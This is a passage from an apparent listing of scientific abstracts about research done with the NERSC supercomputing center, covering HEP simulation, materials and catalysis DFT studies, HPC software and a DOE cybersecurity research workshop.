    The Knights Landing (KNL) release of the Intel Many Integrated Core (MIC) Xeon Phi line of processors is a potential game changer for HEP computing. With 72 cores and deep vector registers, the KNL cards promise significant performance benefits for highly-parallel, compute-heavy applications. Cori, the newest supercomputer at the National Energy Research Scientific Computing Center (NERSC), was delivered to its users in two phases with the first phase online at the end of 2015 and the second phase now online at the end of 2016. Cori Phase 2 is based on the KNL architecture and contains over 9000 compute nodes with 96GB DDR4 memory. ATLAS simulation with the multithreaded Athena Framework (AthenaMT) is a good potential use-case for the KNL architecture and supercomputers like Cori. ATLAS simulation jobs have a high ratio of CPU computation to disk I/O and have been shown to scale well in multi-threading and across many nodes. In this paper we will give an overview of the ATLAS simulation application with details on its multi-threaded design. Then, we will present a performance analysis of the application on KNL devices and compare it to a traditional x86 platform to demonstrate the capabilities of the architecture and evaluate the benefits of utilizing KNL platforms like Cori for ATLAS production.

  20. Development of a fast framing detector for electron microscopy

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Johnson, Ian J.; Bustillo, Karen C.; Ciston, Jim

    2016-10-01

    A high frame rate detector system is described that enables fast real-time data analysis of scanning diffraction experiments in scanning transmission electron microscopy (STEM). This is an end-to-end development that encompasses the data producing detector, data transportation, and real-time processing of data. The detector will consist of a central pixel sensor that is surrounded by annular silicon diodes. Both components of the detector system will synchronously capture data at almost 100 kHz frame rate, which produces an approximately 400 Gb/s data stream. Low-level preprocessing will be implemented in firmware before the data is streamed from the National Center for Electronmore » Microscopy (NCEM) to the National Energy Research Scientific Computing Center (NERSC). Live data processing, before it lands on disk, will happen on the Cori supercomputer and aims to present scientists with prompt experimental feedback. This online analysis will provide rough information of the sample that can be utilized for sample alignment, sample monitoring and verification that the experiment is set up correctly. Only a compressed version of the relevant data is then selected for more in-depth processing.« less

  1. First-principles Studies of Ferroelectricity in BiMnO3 Thin Films

    NASA Astrophysics Data System (ADS)

    Wang, Yun-Peng; Cheng, Hai-Ping

    The ferroelectricity in BiMnO3 thin films is a long-standing problem. We employed a first-principles density functional theory with inclusion of the local Hubbard Coulomb (U) and exchange (J) terms. The parameters U and J are optimized to reproduce the atomic structure and the energy gap of bulk C2/c BiMnO3. With these optimal U and J parameters, the calculated ferromagnetic Curie temperature and lattice dynamics properties agree with experiments. We then studied the ferroelectricity in few-layer BiMnO3 thin films on SrTiO3(001) substrates. Our calculations identified ferroelectricity in monolayer, bilayer and trilayer BiMnO3 thin films. We find that the energy barrier for 90° rotation of electric polarization is about 3 - 4 times larger than that of conventional ferroelectric materials. This work was supported by the US Department of Energy (DOE), Office of Basic Energy Sciences (BES), under Contract No. DE-FG02-02ER45995. Computations were done using the utilities of the National Energy Research Scientific Computing Center (NERSC).

  2. GYROKINETIC PARTICLE SIMULATION OF TURBULENT TRANSPORT IN BURNING PLASMAS

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Horton, Claude Wendell

    2014-06-10

    The SciDAC project at the IFS advanced the state of high performance computing for turbulent structures and turbulent transport. The team project with Prof Zhihong Lin [PI] at Univ California Irvine produced new understanding of the turbulent electron transport. The simulations were performed at the Texas Advanced Computer Center TACC and the NERSC facility by Wendell Horton, Lee Leonard and the IFS Graduate Students working in that group. The research included a Validation of the electron turbulent transport code using the data from a steady state university experiment at the University of Columbia in which detailed probe measurements of themore » turbulence in steady state were used for wide range of temperature gradients to compare with the simulation data. These results were published in a joint paper with Texas graduate student Dr. Xiangrong Fu using the work in his PhD dissertation. X.R. Fu, W. Horton, Y. Xiao, Z. Lin, A.K. Sen and V. Sokolov, “Validation of electron Temperature gradient turbulence in the Columbia Linear Machine, Phys. Plasmas 19, 032303 (2012).« less

  3. Shifter: Containers for HPC

    NASA Astrophysics Data System (ADS)

    Gerhardt, Lisa; Bhimji, Wahid; Canon, Shane; Fasel, Markus; Jacobsen, Doug; Mustafa, Mustafa; Porter, Jeff; Tsulaia, Vakho

    2017-10-01

    Bringing HEP computing to HPC can be difficult. Software stacks are often very complicated with numerous dependencies that are difficult to get installed on an HPC system. To address this issue, NERSC has created Shifter, a framework that delivers Docker-like functionality to HPC. It works by extracting images from native formats and converting them to a common format that is optimally tuned for the HPC environment. We have used Shifter to deliver the CVMFS software stack for ALICE, ATLAS, and STAR on the supercomputers at NERSC. As well as enabling the distribution multi-TB sized CVMFS stacks to HPC, this approach also offers performance advantages. Software startup times are significantly reduced and load times scale with minimal variation to 1000s of nodes. We profile several successful examples of scientists using Shifter to make scientific analysis easily customizable and scalable. We will describe the Shifter framework and several efforts in HEP and NP to use Shifter to deliver their software on the Cori HPC system.

  4. Performance Analysis, Modeling and Scaling of HPC Applications and Tools

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bhatele, Abhinav

    2016-01-13

    E cient use of supercomputers at DOE centers is vital for maximizing system throughput, mini- mizing energy costs and enabling science breakthroughs faster. This requires complementary e orts along several directions to optimize the performance of scienti c simulation codes and the under- lying runtimes and software stacks. This in turn requires providing scalable performance analysis tools and modeling techniques that can provide feedback to physicists and computer scientists developing the simulation codes and runtimes respectively. The PAMS project is using time allocations on supercomputers at ALCF, NERSC and OLCF to further the goals described above by performing research alongmore » the following fronts: 1. Scaling Study of HPC applications; 2. Evaluation of Programming Models; 3. Hardening of Performance Tools; 4. Performance Modeling of Irregular Codes; and 5. Statistical Analysis of Historical Performance Data. We are a team of computer and computational scientists funded by both DOE/NNSA and DOE/ ASCR programs such as ECRP, XStack (Traleika Glacier, PIPER), ExaOSR (ARGO), SDMAV II (MONA) and PSAAP II (XPACC). This allocation will enable us to study big data issues when analyzing performance on leadership computing class systems and to assist the HPC community in making the most e ective use of these resources.« less

  5. Multigrid treatment of implicit continuum diffusion

    NASA Astrophysics Data System (ADS)

    Francisquez, Manaure; Zhu, Ben; Rogers, Barrett

    2017-10-01

    Implicit treatment of diffusive terms of various differential orders common in continuum mechanics modeling, such as computational fluid dynamics, is investigated with spectral and multigrid algorithms in non-periodic 2D domains. In doubly periodic time dependent problems these terms can be efficiently and implicitly handled by spectral methods, but in non-periodic systems solved with distributed memory parallel computing and 2D domain decomposition, this efficiency is lost for large numbers of processors. We built and present here a multigrid algorithm for these types of problems which outperforms a spectral solution that employs the highly optimized FFTW library. This multigrid algorithm is not only suitable for high performance computing but may also be able to efficiently treat implicit diffusion of arbitrary order by introducing auxiliary equations of lower order. We test these solvers for fourth and sixth order diffusion with idealized harmonic test functions as well as a turbulent 2D magnetohydrodynamic simulation. It is also shown that an anisotropic operator without cross-terms can improve model accuracy and speed, and we examine the impact that the various diffusion operators have on the energy, the enstrophy, and the qualitative aspect of a simulation. This work was supported by DOE-SC-0010508. This research used resources of the National Energy Research Scientific Computing Center (NERSC).

  6. User and Performance Impacts from Franklin Upgrades

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    He, Yun

    2009-05-10

    The NERSC flagship computer Cray XT4 system"Franklin" has gone through three major upgrades: quad core upgrade, CLE 2.1 upgrade, and IO upgrade, during the past year. In this paper, we will discuss the various aspects of the user impacts such as user access, user environment, and user issues etc from these upgrades. The performance impacts on the kernel benchmarks and selected application benchmarks will also be presented.

  7. Effect of Graphene with Nanopores on Metal Clusters

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Zhou, Hu; Chen, Xianlang; Wang, Lei

    Porous graphene, which is a novel type of defective graphene, shows excellent potential as a support material for metal clusters. In this work, the stability and electronic structures of metal clusters (Pd, Ir, Rh) supported on pristine graphene and graphene with different sizes of nanopore were investigated by first-principle density functional theory (DFT) calculations. Thereafter, CO adsorption and oxidation reaction on the Pd-graphene system were chosen to evaluate its catalytic performance. Graphene with nanopore can strongly stabilize the metal clusters and cause a substantial downshift of the d-band center of the metal clusters, thus decreasing CO adsorption. All binding energies,more » d-band centers, and adsorption energies show a linear change with the size of the nanopore: a bigger size of nanopore corresponds to a stronger metal clusters bond to the graphene, lower downshift of the d-band center, and weaker CO adsorption. By using a suitable size nanopore, supported Pd clusters on the graphene will have similar CO and O2 adsorption ability, thus leading to superior CO tolerance. The DFT calculated reaction energy barriers show that graphene with nanopore is a superior catalyst for CO oxidation reaction. These properties can play an important role in instructing graphene-supported metal catalyst preparation to prevent the diffusion or agglomeration of metal clusters and enhance catalytic performance. This work was supported by National Basic Research Program of China (973Program) (2013CB733501), the National Natural Science Foundation of China (NSFC-21176221, 21136001, 21101137, 21306169, and 91334013). D. Mei acknowledges the support from the US Department of Energy, Office of Science, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences & Biosciences. Pacific Northwest National Laboratory (PNNL) is a multiprogram national laboratory operated for DOE by Battelle. Computing time was granted by the grand challenge of computational catalysis of the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL) and by the National Energy Research Scientific Computing Center (NERSC).« less

  8. ASCR Cybersecurity for Scientific Computing Integrity - Research Pathways and Ideas Workshop

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Peisert, Sean; Potok, Thomas E.; Jones, Todd

    At the request of the U.S. Department of Energy's (DOE) Office of Science (SC) Advanced Scientific Computing Research (ASCR) program office, a workshop was held June 2-3, 2015, in Gaithersburg, MD, to identify potential long term (10 to +20 year) cybersecurity fundamental basic research and development challenges, strategies and roadmap facing future high performance computing (HPC), networks, data centers, and extreme-scale scientific user facilities. This workshop was a follow-on to the workshop held January 7-9, 2015, in Rockville, MD, that examined higher level ideas about scientific computing integrity specific to the mission of the DOE Office of Science. Issues includedmore » research computation and simulation that takes place on ASCR computing facilities and networks, as well as network-connected scientific instruments, such as those run by various DOE Office of Science programs. Workshop participants included researchers and operational staff from DOE national laboratories, as well as academic researchers and industry experts. Participants were selected based on the submission of abstracts relating to the topics discussed in the previous workshop report [1] and also from other ASCR reports, including "Abstract Machine Models and Proxy Architectures for Exascale Computing" [27], the DOE "Preliminary Conceptual Design for an Exascale Computing Initiative" [28], and the January 2015 machine learning workshop [29]. The workshop was also attended by several observers from DOE and other government agencies. The workshop was divided into three topic areas: (1) Trustworthy Supercomputing, (2) Extreme-Scale Data, Knowledge, and Analytics for Understanding and Improving Cybersecurity, and (3) Trust within High-end Networking and Data Centers. Participants were divided into three corresponding teams based on the category of their abstracts. The workshop began with a series of talks from the program manager and workshop chair, followed by the leaders for each of the three topics and a representative of each of the four major DOE Office of Science Advanced Scientific Computing Research Facilities: the Argonne Leadership Computing Facility (ALCF), the Energy Sciences Network (ESnet), the National Energy Research Scientific Computing Center (NERSC), and the Oak Ridge Leadership Computing Facility (OLCF). The rest of the workshop consisted of topical breakout discussions and focused writing periods that produced much of this report.« less

  9. Opening Comments: SciDAC 2008

    NASA Astrophysics Data System (ADS)

    Strayer, Michael

    2008-07-01

    Welcome to Seattle and the 2008 SciDAC Conference. This conference, the fourth in the series, is a continuation of the PI meetings we first began under SciDAC-1. I would like to start by thanking the organizing committee, and Rick Stevens in particular, for organizing this year's meeting. This morning I would like to look briefly at SciDAC, to give you a brief history of SciDAC and also look ahead to see where we plan to go over the next few years. I think the best description of SciDAC, at least the simulation part, comes from a quote from Dr Ray Orbach, DOE's Under Secretary for Science and Director of the Office of Science. In an interview that appeared in the SciDAC Review magazine, Dr Orbach said, `SciDAC is unique in the world. There isn't any other program like it anywhere else, and it has the remarkable ability to do science by bringing together physical scientists, mathematicians, applied mathematicians, and computer scientists who recognize that computation is not something you do at the end, but rather it needs to be built into the solution of the very problem that one is addressing'. Of course, that is extended not just to physical scientists, but also to biological scientists. This is a theme of computational science, this partnership among disciplines, which goes all the way back to the early 1980s and Ken Wilson. It's a unique thread within the Department of Energy. SciDAC-1, launched around the turn of the millennium, created a new generation of scientific simulation codes. It advocated building out mathematical and computing system software in support of science and a new collaboratory software environment for data. The original concept for SciDAC-1 had topical centers for the execution of the various science codes, but several corrections and adjustments were needed. The ASCR scientific computing infrastructure was also upgraded, providing the hardware facilities for the program. The computing facility that we had at that time was the big 3 teraflop/s center at NERSC and that had to be shared with the programmatic side supporting research across DOE. At the time, ESnet was just slightly over half a gig per sec of bandwidth; and the science being addressed was accelerator science, climate, chemistry, fusion, astrophysics, materials science, and QCD. We built out the national collaboratories from the ASCR office, and in addition we built Integrated Software Infrastructure Centers (ISICs). Of these, three were in applied mathematics, four in computer science (including a performance evaluation research center), and four were collaboratories or Grid projects having to do with data management. For science, there were remarkable breakthroughs in simulation, such as full 3D laboratory scale flame simulation. There were also significant improvements in application codes - from factors of almost 3 to more than 100 - and code improvement as people began to realize they had to integrate mathematics tools and computer science tools into their codes to take advantage of the parallelism of the day. The SciDAC data-mining tool, Sapphire, received a 2006 R&D 100 award. And the community as a whole worked well together and began building a publication record that was substantial. In 2006, we recompeted the program with similar goals - SciDAC-1 was very successful, and we wanted to continue that success and extend what was happening under SciDAC to the broader science community. We opened up the partnership to all of the Offices of Science and the NSF and the NNSA. The goal was to create comprehensive scientific computing software and the infrastructure for the software to enable scientific discovery in the physical, biological, and environmental sciences and take the simulations to an extreme scale, in this case petascale. We would also build out a new generation of data management tools. What we observed during SciDAC-1 was that the data and the data communities - both experimental data from large experimental facilities and observational data, along with simulation data - were expanding at a rate significantly faster than Moore's law. In the past few weeks, the FastBit indexing technology software tool for data analyses and data mining developed under SciDAC's Scientific Data Management project was recognized with an R&D 100 Award, selected by an independent judging panel and editors of R&D Magazine as one of the 100 most technologically significant products introduced into the marketplace over the past year. For SciDAC-2 we had nearly 250 proposals requesting a total of slightly over 1 billion in funding. Of course, we had nowhere near 1 billion. The facilities and the science we ended up with were not significantly different from what we had in SciDAC-1. But we had put in place substantially increased facilities for science. When SciDAC-1 was originally executed with the facilities at NERSC, there was significant impact on the resources at NERSC, because not only did we have an expanding portfolio of programmatic science, but we had the SciDAC projects that also needed to run at NERSC. Suddenly, NERSC was incredibly oversubscribed. With SciDAC-2, we had in place leadership-class computing facilities at Argonne with slightly more than half a petaflop and at Oak Ridge with slightly more than a quarter petaflop with an upgrade planned at the end of this year for a petaflop. And we increased the production computing capacity at NERSC to 104 teraflop/s just so that we would not impact the programmatic research and so that we would have a startup facility for SciDAC. At the end of the summer, NERSC will be at 360 teraflop/s. Both the Oak Ridge system and the principal resource at NERSC are Cray systems; Argonne has a different architecture, an IBM Blue Gene/P. At the same time, ESnet has been built out, and we are on a path where we will have dual rings around the country, from 10 to 40 gigabits per second - a factor of 20 to 80 over what was available during SciDAC-1. The science areas include accelerator science and simulation, astrophysics, climate modeling and simulation, computational biology, fusion science, high-energy physics, petabyte high-energy/ nuclear physics, materials science and chemistry, nuclear physics, QCD, radiation transport, turbulence, and groundwater reactive transport modeling and simulation. They were supported by new enabling technology centers and university-based institutes to develop an educational thread for the SciDAC program. There were four mathematics projects and four computer science projects; and under data management, we see a significant difference in that we are bringing up new visualization projects to support and sustain data-intensive science. When we look at the budgets, we see growth in the budget from just under 60 million for SciDAC-1 to just over 80 for SciDAC-2. Part of the growth is due to bringing in NSF and NNSA as new partners, and some of the growth is due to some program offices increasing their investment in SciDAC, while other program offices are constant or have decreased their investment. This is not a reflection of their priorities per se but, rather, a reflection of the budget process and the difficult times in Washington during the past two years. New activities are under way in SciDAC - the annual PI meeting has turned into what I would describe as the premier interdisciplinary computational science meeting, one of the best in the world. Doing interdisciplinary meetings is difficult because people tend to develop a focus for their particular subject area. But this is the fourth in the series; and since the first meeting in San Francisco, these conferences have been remarkably successful. For SciDAC-2 we also created an outreach magazine, SciDAC Review, which highlights scientific discovery as well as high-performance computing. It's been very successful in telling the non-practitioners what SciDAC and computational science are all about. The other new instrument in SciDAC-2 is an outreach center. As we go from computing at the terascale to computing at the petascale, we face the problem of narrowing our research community. The number of people who are `literate' enough to compute at the terascale is more than the number of those who can compute at the petascale. To address this problem, we established the SciDAC Outreach Center to bring people into the fold and educate them as to how we do SciDAC, how the teams are composed, and what it really means to compute at scale. The resources I have mentioned don't come for free. As part of the HECRTF law of 2005, Congress mandated that the Secretary would ensure that leadership-class facilities would be open to everyone across all agencies. So we took Congress at its word, and INCITE is our instrument for making allocations at the leadership-class facilities at Argonne and Oak Ridge, as well as smaller allocations at NERSC. Therefore, the selected proposals are very large projects that are computationally intensive, that compute at scale, and that have a high science impact. An important feature is that INCITE is completely open to anyone - there is no requirement of DOE Office of Science funding, and proposals are rigorously reviewed for both the science and the computational readiness. In 2008, more than 100 proposals were received, requesting about 600 million processor-hours. We allocated just over a quarter of a billion processor-hours. Astrophysics, materials science, lattice gauge theory, and high energy and nuclear physics were the major areas. These were the teams that were computationally ready for the big machines and that had significant science they could identify. In 2009, there will be a significant increase amount of time to be allocated, over half a billion processor-hours. The deadline is August 11 for new proposals and September 12 for renewals. We anticipate a significant increase in the number of requests this year. We expect you - as successful SciDAC centers, institutes, or partnerships - to compete for and win INCITE program allocation awards. If you have a successful SciDAC proposal, we believe it will make you successful in the INCITE review. We have the expectation that you will among those most prepared and most ready to use the machines and to compute at scale. Over the past 18 months, we have assembled a team to look across our computational science portfolio and to judge what are the 10 most significant science accomplishments. The ASCR office, as it goes forward with OMB, the new administration, and Congress, will be judged by the science we have accomplished. All of our proposals - such as for increasing SciDAC, increasing applied mathematics, and so on - are tied to what have we accomplished in science. And so these 10 big accomplishments are key to establishing credibility for new budget requests. Tony Mezzacappa, who chaired the committee, will also give a presentation on the ranking of these top 10, how they got there, and what the science is all about. Here is the list - numbers 2, 5, 6, 7, 9, and 10 are all SciDAC projects. RankTitle 1Modeling the Molecular Basis of Parkinson's Disease (Tsigelny) 2Discovery of the Standing Accretion Shock Instability and Pulsar Birth Mechanism in a Core-Collapse Supernova Evolution and Explosion (Blondin) 3Prediction and Design of Macromolecular Structures and Functions (Baker) 4Understanding How Lifted Flame Stabilized in a Hot Coflow (Yoo) 5New Insights from LCF-enabled Advanced Kinetic Simulations of Global Turbulence in Fusion Systems (Tang) 6High Transition Temperature Superconductivity: A High-Temperature Superconductive State and a Pairing Mechanism in 2-D Hubbard Model (Scalapino) 7 PETsc: Providing the Solvers for DOE High-Performance Simulations (Smith) 8 Via Lactea II, A Billion Particle Simulation of the Dark Matter Halo of the Milky Way (Madau) 9Probing the Properties of Water through Advanced Computing (Galli) 10First Provably Scalable Maxwell Solver Enables Scalable Electromagnetic Simulations (Kovel) So, what's the future going to look like for us? The office is putting together an initiative with the community, which we call the E3 Initiative. We're looking for a 10-year horizon for what's going to happen. Through the series of town hall meetings, which many of you participated in, we have produced a document on `Transforming Energy, the Environment and Science through simulations at the eXtreme Scale'; it can be found at http://www.science.doe.gov/ascr/ProgramDocuments/TownHall.pdf . We sometimes call it the Exascale initiative. Exascale computing is the gold-ring level of computing that seems just out of reach; but if we work hard and stretch, we just might be able to reach it. We envision that there will be a SciDAC-X, working at the extreme scale, with SciDAC teams that will perform and carry out science in the areas that will have a great societal impact, such as alternative fuels and transportation, combustion, climate, fusion science, high-energy physics, advanced fuel cycles, carbon management, and groundwater. We envision institutes for applied mathematics and computer science that probably will segue into algorithms because, at the extreme scale, we see the distinction between the applied math and the algorithm per se and its implementation in computer science as being inseparable. We envision an INCITE-X with multi-petaflop platforms, perhaps even exaflop computing resources. ESnet will be best in class - our 10-year plan calls for having 400 terabits per second capacity available in dual rings around the country, an enormously fast data communications network for moving large amounts of data. In looking at where we've been and where we are going, we can see that the gigaflops and teraflops era was a regime where we were following Moore's law through advances in clock speed. In the current regime, we're introducing massive parallelism, which I think is exemplified by Intel's announcement of their teraflop chip, where they envision more than a thousand cores on a chip. But in order to reach exascale, extrapolations talk about machines that require 100 megawatts of power in terms of current architectures. It's clearly going to require novel architectures, things we have perhaps not yet envisioned. It is of course an era of challenge. There will be an unpredictable evolution of hardware if we are to reach the exascale; and there will clearly be multilevel heterogeneous parallelism, including multilevel memory hierarchies. We have no idea right now as to the programming models needed to execute at such an extreme scale. We have been incredibly successful at the petascale - we know that already. Managing data and just getting communications to scale is an enormous challenge. And it's not just the extreme scaling. It's the rapid increase in complexity that represents the challenge. Let me end with a metaphor. In previous meetings we have talked about the road to petascale. Indeed, we have seen in hindsight that it was a road well traveled. But perhaps the road to exascale is not a road at all. Perhaps the metaphor will be akin to scaling the south face of K2. That's clearly not something all of us will be able to do, and probably computing at the exascale is not something all of us will do. But if we achieve that goal, perhaps the words of Emily Dickinson will best summarize where we will be. Perhaps in her words, looking backward and down, you will say: I climb the `Hill of Science' I view the landscape o'er; Such transcendental prospect I ne'er beheld before!

  10. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Jing Yanfei, E-mail: yanfeijing@uestc.edu.c; Huang Tingzhu, E-mail: tzhuang@uestc.edu.c; Duan Yong, E-mail: duanyong@yahoo.c

    This study is mainly focused on iterative solutions with simple diagonal preconditioning to two complex-valued nonsymmetric systems of linear equations arising from a computational chemistry model problem proposed by Sherry Li of NERSC. Numerical experiments show the feasibility of iterative methods to some extent when applied to the problems and reveal the competitiveness of our recently proposed Lanczos biconjugate A-orthonormalization methods to other classic and popular iterative methods. By the way, experiment results also indicate that application specific preconditioners may be mandatory and required for accelerating convergence.

  11. Double photoionization of Be-like (Be-F5+) ions

    NASA Astrophysics Data System (ADS)

    Abdel Naby, Shahin; Pindzola, Michael; Colgan, James

    2015-04-01

    The time-dependent close-coupling method is used to study the single photon double ionization of Be-like (Be - F5+) ions. Energy and angle differential cross sections are calculated to fully investigate the correlated motion of the two photoelectrons. Symmetric and antisymmetric amplitudes are presented along the isoelectronic sequence for different energy sharing of the emitted electrons. Our total double photoionization cross sections are in good agreement with available theoretical results and experimental measurements along the Be-like ions. This work was supported in part by grants from NSF and US DoE. Computational work was carried out at NERSC in Oakland, California and the National Institute for Computational Sciences in Knoxville, Tennessee.

  12. Toward Exascale Earthquake Ground Motion Simulations for Near-Fault Engineering Analysis

    DOE PAGES

    Johansen, Hans; Rodgers, Arthur; Petersson, N. Anders; ...

    2017-09-01

    Modernizing SW4 for massively parallel time-domain simulations of earthquake ground motions in 3D earth models increases resolution and provides ground motion estimates for critical infrastructure risk evaluations. Simulations of ground motions from large (M ≥ 7.0) earthquakes require domains on the order of 100 to500 km and spatial granularity on the order of 1 to5 m resulting in hundreds of billions of grid points. Surface-focused structured mesh refinement (SMR) allows for more constant grid point per wavelength scaling in typical Earth models, where wavespeeds increase with depth. In fact, MR allows for simulations to double the frequency content relative tomore » a fixed grid calculation on a given resource. The authors report improvements to the SW4 algorithm developed while porting the code to the Cori Phase 2 (Intel Xeon Phi) systems at the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory. As a result, investigations of the performance of the innermost loop of the calculations found that reorganizing the order of operations can improve performance for massive problems.« less

  13. Toward Exascale Earthquake Ground Motion Simulations for Near-Fault Engineering Analysis

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Johansen, Hans; Rodgers, Arthur; Petersson, N. Anders

    Modernizing SW4 for massively parallel time-domain simulations of earthquake ground motions in 3D earth models increases resolution and provides ground motion estimates for critical infrastructure risk evaluations. Simulations of ground motions from large (M ≥ 7.0) earthquakes require domains on the order of 100 to500 km and spatial granularity on the order of 1 to5 m resulting in hundreds of billions of grid points. Surface-focused structured mesh refinement (SMR) allows for more constant grid point per wavelength scaling in typical Earth models, where wavespeeds increase with depth. In fact, MR allows for simulations to double the frequency content relative tomore » a fixed grid calculation on a given resource. The authors report improvements to the SW4 algorithm developed while porting the code to the Cori Phase 2 (Intel Xeon Phi) systems at the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory. As a result, investigations of the performance of the innermost loop of the calculations found that reorganizing the order of operations can improve performance for massive problems.« less

  14. Dehydration of 1-octadecanol over H-BEA: A combined experimental and computational study

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Song, Wenji; Liu, Yuanshuai; Barath, Eszter

    Liquid phase dehydration of 1-octdecanol, which is intermediately formed during the hydrodeoxygenation of microalgae oil, has been explored in a combined experimental and computational study. The alkyl chain of C18 alcohol interacts with acid sites during diffusion inside the zeolite pores, resulting in an inefficient utilization of the Brønsted acid sites for samples with high acid site concentrations. The parallel intra- and inter- molecular dehydration pathways having different activation energies pass through alternative reaction intermediates. Formation of surface-bound alkoxide species is the rate-limiting step during intramolecular dehydration, whereas intermolecular dehydration proceeds via a bulky dimer intermediate. Octadecene is the primarymore » dehydration product over H-BEA at 533 K. Despite of the main contribution of Brønsted acid sites towards both dehydration pathways, Lewis acid sites are also active in the formation of dioctadecyl ether. The intramolecular dehydration to octadecene and cleavage of the intermediately formed ether, however, require strong BAS. L. Wang, D. Mei and J. A. Lercher, acknowledge the partial support from the US Department of Energy, Office of Science, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences & Biosciences. Pacific Northwest National Laboratory (PNNL) is a multiprogram national laboratory operated for DOE by Battelle. Computing time was granted by the grand challenge of computational catalysis of the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL) and by the National Energy Research Scientific Computing Center (NERSC). EMSL is a national scientific user facility located at Pacific Northwest National Laboratory (PNNL) and sponsored by DOE’s Office of Biological and Environmental Research.« less

  15. Ab initio molecular dynamics simulations for the role of hydrogen in catalytic reactions of furfural on Pd(111)

    NASA Astrophysics Data System (ADS)

    Xue, Wenhua; Dang, Hongli; Liu, Yingdi; Jentoft, Friederike; Resasco, Daniel; Wang, Sanwu

    2014-03-01

    In the study of catalytic reactions of biomass, furfural conversion over metal catalysts with the presence of hydrogen has attracted wide attention. We report ab initio molecular dynamics simulations for furfural and hydrogen on the Pd(111) surface at finite temperatures. The simulations demonstrate that the presence of hydrogen is important in promoting furfural conversion. In particular, hydrogen molecules dissociate rapidly on the Pd(111) surface. As a result of such dissociation, atomic hydrogen participates in the reactions with furfural. The simulations also provide detailed information about the possible reactions of hydrogen with furfural. Supported by DOE (DE-SC0004600). This research used the supercomputer resources of the XSEDE, the NERSC Center, and the Tandy Supercomputing Center.

  16. First-principles quantum-mechanical investigations of biomass conversion at the liquid-solid interfaces

    NASA Astrophysics Data System (ADS)

    Dang, Hongli; Xue, Wenhua; Liu, Yingdi; Jentoft, Friederike; Resasco, Daniel; Wang, Sanwu

    2014-03-01

    We report first-principles density-functional calculations and ab initio molecular dynamics (MD) simulations for the reactions involving furfural, which is an important intermediate in biomass conversion, at the catalytic liquid-solid interfaces. The different dynamic processes of furfural at the water-Cu(111) and water-Pd(111) interfaces suggest different catalytic reaction mechanisms for the conversion of furfural. Simulations for the dynamic processes with and without hydrogen demonstrate the importance of the liquid-solid interface as well as the presence of hydrogen in possible catalytic reactions including hydrogenation and decarbonylation of furfural. Supported by DOE (DE-SC0004600). This research used the supercomputer resources of the XSEDE, the NERSC Center, and the Tandy Supercomputing Center.

  17. 2009 ALCF annual report.

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Beckman, P.; Martin, D.; Drugan, C.

    2010-11-23

    This year the Argonne Leadership Computing Facility (ALCF) delivered nearly 900 million core hours of science. The research conducted at their leadership class facility touched our lives in both minute and massive ways - whether it was studying the catalytic properties of gold nanoparticles, predicting protein structures, or unearthing the secrets of exploding stars. The authors remained true to their vision to act as the forefront computational center in extending science frontiers by solving pressing problems for our nation. Our success in this endeavor was due mainly to the Department of Energy's (DOE) INCITE (Innovative and Novel Computational Impact onmore » Theory and Experiment) program. The program awards significant amounts of computing time to computationally intensive, unclassified research projects that can make high-impact scientific advances. This year, DOE allocated 400 million hours of time to 28 research projects at the ALCF. Scientists from around the world conducted the research, representing such esteemed institutions as the Princeton Plasma Physics Laboratory, National Institute of Standards and Technology, and European Center for Research and Advanced Training in Scientific Computation. Argonne also provided Director's Discretionary allocations for research challenges, addressing such issues as reducing aerodynamic noise, critical for next-generation 'green' energy systems. Intrepid - the ALCF's 557-teraflops IBM Blue/Gene P supercomputer - enabled astounding scientific solutions and discoveries. Intrepid went into full production five months ahead of schedule. As a result, the ALCF nearly doubled the days of production computing available to the DOE Office of Science, INCITE awardees, and Argonne projects. One of the fastest supercomputers in the world for open science, the energy-efficient system uses about one-third as much electricity as a machine of comparable size built with more conventional parts. In October 2009, President Barack Obama recognized the excellence of the entire Blue Gene series by awarding it to the National Medal of Technology and Innovation. Other noteworthy achievements included the ALCF's collaboration with the National Energy Research Scientific Computing Center (NERSC) to examine cloud computing as a potential new computing paradigm for scientists. Named Magellan, the DOE-funded initiative will explore which science application programming models work well within the cloud, as well as evaluate the challenges that come with this new paradigm. The ALCF obtained approval for its next-generation machine, a 10-petaflops system to be delivered in 2012. This system will allow us to resolve ever more pressing problems, even more expeditiously through breakthrough science in the years to come.« less

  18. First-Principles Thermodynamics Study of Spinel MgAl 2 O 4 Surface Stability

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Cai, Qiuxia; Wang, Jian-guo; Wang, Yong

    The surface stability of all possible terminations for three low-index (111, 110, 100) structures of the spinel MgAl2O4 has been studied using first-principles based thermodynamic approach. The surface Gibbs free energy results indicate that the 100_AlO2 termination is the most stable surface structure under ultra-high vacuum at T=1100 K regardless of Al-poor or Al-rich environment. With increasing oxygen pressure, the 111_O2(Al) termination becomes the most stable surface in the Al-rich environment. The oxygen vacancy formation is thermodynamically favorable over the 100_AlO2, 111_O2(Al) and the (111) structure with Mg/O connected terminations. On the basis of surface Gibbs free energies for bothmore » perfect and defective surface terminations, the 100_AlO2 and 111_O2(Al) are the most dominant surfaces in Al-rich environment under atmospheric condition. This is also consistent with our previously reported experimental observation. This work was supported by a Laboratory Directed Research and Development (LDRD) project of the Pacific Northwest National Laboratory (PNNL). The computing time was granted by the National Energy Research Scientific Computing Center (NERSC). Part of computing time was also granted by a scientific theme user proposal in the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL), which is a U.S. Department of Energy national scientific user facility located at PNNL in Richland, Washington.« less

  19. Computational Investigations of Rovibrational Quenching of HD due to Collisions in the Interstellar Medium

    NASA Astrophysics Data System (ADS)

    Goodman Veazey, Clark; Wan, Yier; Yang, Benhui H.; Stancil, P.

    2017-06-01

